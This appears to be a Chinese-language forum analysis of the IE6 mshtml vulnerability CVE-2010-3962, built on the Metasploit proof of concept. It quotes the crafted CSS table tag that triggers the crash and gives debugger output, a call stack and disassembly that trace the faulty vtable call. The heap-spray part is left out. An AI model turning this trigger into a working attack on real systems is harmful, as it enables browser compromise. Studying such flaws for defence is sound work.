本机环境为win xp sp3+IE6,mshtml版本为6.0.2900.5726,poc样本来自metasploit->CVE-2010-3962。
Metasploit上对该漏洞的简述为:mshtml在解析某特定CSS Tag时,有可能发生内存错误,进而导致某次调用变成[vTable+0x30+1],此漏洞能否利用取决于[vTable+0x30+1]处取出的地址能否被heapspray覆盖,因为不能操纵eip,所以此漏洞无法使用ROP来bypass DEP云云。
Poc分为两部分,一部分为heapspray,此处略过,另一部分是引发漏洞的那个特制的CSS Tag,如下
<table style=position:absolute;clip:rect(0)>
(950.274): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=7e2233e1 ebx=0012d6a0 ecx=0273b6e0 edx=3fffffff esi=00000000 edi=0273b6e0
eip=147e27c9 esp=0012d654 ebp=0012d664 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
<Unloaded_erify.dll>+0x147e27c8:
147e27c9 ?? ???
0:000> k
ChildEBP RetAddr
WARNING: Frame IP not in any known module. Following frames may be wrong.
0012d650 7e291a95 <Unloaded_erify.dll>+0x147e27c8
0012d664 7e2c61df mshtml!CLayout::EnsureDispNodeBackground+0x97
0012d728 7e2c5440 mshtml!CTableLayoutBlock::EnsureTableDispNode+0x388
0012d908 7e2c5c25 mshtml!CTableLayout::CalculateLayout+0x295
0012da58 7e28b790 mshtml!CTableLayout::CalcSizeVirtual+0x665
0012db6c 7e2b9ec5 mshtml!CLayout::CalcSize+0x224
0012dbe0 7e2baa11 mshtml!CFlowLayout::MeasureSite+0x1e5
0012dc24 7e2ba948 mshtml!CFlowLayout::GetSiteWidth+0x12b
.text:7E291A4E mov edi, [ebp+pDispNode] ;参数2
.text:7E291A51 test edi, edi
.text:7E291A53 mov esi, ecx
.text:7E291A55 jz loc_7E32D97B
;------------------------------此处略过部分------------------------------
.text:7E291A87 mov ecx, edi
.text:7E291A89 call CDispNode::SetBackground(int)
.text:7E291A8E mov eax, [edi];eax = pDispNode -> vTable
.text:7E291A90 mov ecx, edi ;ecx = pDispNode -> this
.text:7E291A92 call dword ptr [eax+30h] ; CRASH!!!!
ba e 1 7E291B73 ".printf \"CDispNode 0x%08x\n\",@eax;.echo;g"
0:014> g
ModLoad: 75bc0000 75c3d000 C:\WINDOWS\system32\jscript.dll
CDispNode 0x02739144
CDispNode 0x027391b0
CDispNode 0x0273b304
CDispNode [COLOR="red"]0x0273b350 [/COLOR]
(a84.eb4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=7e2233e1 ebx=0012d6a0 ecx=0273b350 edx=3fffffff esi=00000000 edi=[COLOR="red"]0273b350[/COLOR]
eip=147e27c9 esp=0012d654 ebp=0012d664 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
<Unloaded_erify.dll>+0x147e27c8:
147e27c9 ?? ???